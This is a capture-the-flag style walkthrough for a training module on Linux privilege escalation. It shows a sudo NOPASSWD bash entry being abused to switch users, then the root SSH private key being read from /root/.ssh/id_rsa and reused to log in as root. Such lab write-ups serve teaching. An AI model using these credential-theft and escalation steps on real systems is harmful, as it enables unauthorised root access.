Getting started | privilege escalation | quick solve

Hello, its x69h4ck3r here again.

I am gonna make this quick.

in other to solve this module, we need to gain access into the

target machine via ssh.

after that, we gain super user rights on the user2 user

then escalate our privilege to root user.

please follow my steps, will try to make this as easy as possible.

Step 1: connect to target machine via ssh with the credential provided;
example; ssh -l user1 <target_ip> -p

Step 2: input the given password in the password field.

NB: password text do not show on unix systems.

Step 3: Once connected, verify the directory you are in.
example; whoami

Step 4: Once sure you are in user1, change directory to user2.
example; cd … && cd user2 # this command will put you in user2 directory

Step 5: use the comman below to check if the /bin/bash file is readable
without password.
example; sudo -l
output; env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User user1 may run the following commands on gettingstartedprivesc-385616-5779f4664c-847tn:
(user2 : user2) NOPASSWD: /bin/bash

from the output we see that, we can run the user2 without password,

so we try it on /bin/bash , if no error is gotten, we then procced

to getting our first flag.

Step 6: use this command to view the /flag.txt file
example; cat flag.txt

GAINGING SUPER USER PRIVILEGE

in the /root/.ssh/id_rsa file hold the ssh key, if we can read that,

then we can use it to our advantage in connecting to the ssh

using the root user.

we first have to copy the ssh key, create a new file on our host

machine with the name “id_rsa” and paste the key in there, we will

using this file to connect to the target machine via ssh using the root

user.

Step 1: Read the /root/.ssh/id_rsa file and copy the contents.
example; cat /root/.ssh/id_rsa # copy the contents (ssh key)

Step 2: on your target machine create a new file “id_rsa” and paste the
copied contents in it.
example; nano id_rsa # once open, paste the copied contents (ssh key) and
# save.

Step 3: Cross-check you have done a good job by viewing the newly created
file.
example; cat id_rsa

Step 4: change the permissions on the newly created file to be more restrictive.
example; chmod 600 id_rsa

Step 5: Connect to the target server via ssh using the root as user and
the /id_rsa file for authentication, this way we can gain root access.
example; ssh root@<target_ip> -p -i id_rsa

Once connected, you will be in the root folder.

view the contents of the folder with the “ls” command

Step 6: Use the cat command to view the flag in the /flag.txt file
example; cat flag.txt

i hope it helps… Good luck. :slightly_smiling_face: